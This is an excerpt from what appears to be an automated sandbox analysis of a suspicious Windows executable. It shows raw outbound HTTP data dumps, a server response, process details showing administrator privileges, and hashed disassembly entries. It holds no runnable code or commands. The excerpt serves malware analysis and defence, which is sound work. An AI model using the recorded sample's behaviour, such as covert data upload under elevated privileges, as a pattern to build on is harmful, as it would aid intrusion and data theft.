                                                                Data Ascii: i?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#M
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 61 dd 10 eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2 fd
                                                                Data Ascii: ak}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:iv
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: c7 ad 5c 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a ea
                                                                Data Ascii: \w"ms.[m=TFpZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*
                                                                2024-10-31 10:28:01 UTC1025INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:28:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=0eko1ud5acouvidkkkm6o2db0r; expires=Mon, 24-Feb-2025 04:14:40 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6brJ7qw%2BPYRa%2B4t4tyJjPxs48RbiRskWFuI%2FZxn1KADyyHVTNfvcvoQxZ1VQdjEKsONRBEhSiyWasXSpKgAXPDX78Qd%2F8vvFojbBMo67bSgkIJyngiepKtDrnks1KmaZDZ%2F5Mo%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f4ad5bffe72a-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1352&sent=215&recv=610&lost=0&retrans=0&sent_bytes=2844&recv_bytes=572682&delivery_rate=2100072&cwnd=222&unsent_bytes=0&cid=d715826487d05dc8&ts=1766&x=0"


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:06:27:48
                                                                Start date:31/10/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x7a0000
                                                                File size:3'038'208 bytes
                                                                MD5 hash:D6D4C4264450023D69BDA4D017FE3771
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Non-executed Functions

                                                                  Function 00FFB939 Relevance: .2, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.2140689399.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FF9000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_ff9000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf5d0db71fd1755f9126b280e9fabfca5d8153590891a22b2047c7b534df828b
                                                                  • Instruction ID: c4ffeb77534b6a6446915221cb1a05e5a71e5f96613d671291b47b1d4726076d
                                                                  • Opcode Fuzzy Hash: cf5d0db71fd1755f9126b280e9fabfca5d8153590891a22b2047c7b534df828b
                                                                  • Instruction Fuzzy Hash: 5331263140E3D99FC3179B74896A5A2BFB0AE1721171A15EFC8C18F1B3D3A8485AD762
                                                                  Function 0103496C Relevance: .1, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.2172028798.0000000001015000.00000004.00000020.00020000.00000000.sdmp, Offset: 01015000, based on PE: false
                                                                  • Associated: 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_1015000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1ea834a868891060def7ffeabde8e9f2221de50728997cb368c57a240d8ade2
                                                                  • Instruction ID: 999a0dab5d0f9f68c5cc853e1875df12b18918ceeae396c1bb51ca9fcea4c93a
                                                                  • Opcode Fuzzy Hash: a1ea834a868891060def7ffeabde8e9f2221de50728997cb368c57a240d8ade2
                                                                  • Instruction Fuzzy Hash: ED41D03640A7C18FC716CF78C8515DA7FB5FF8231475988DAC4C0DE027C266A956CB46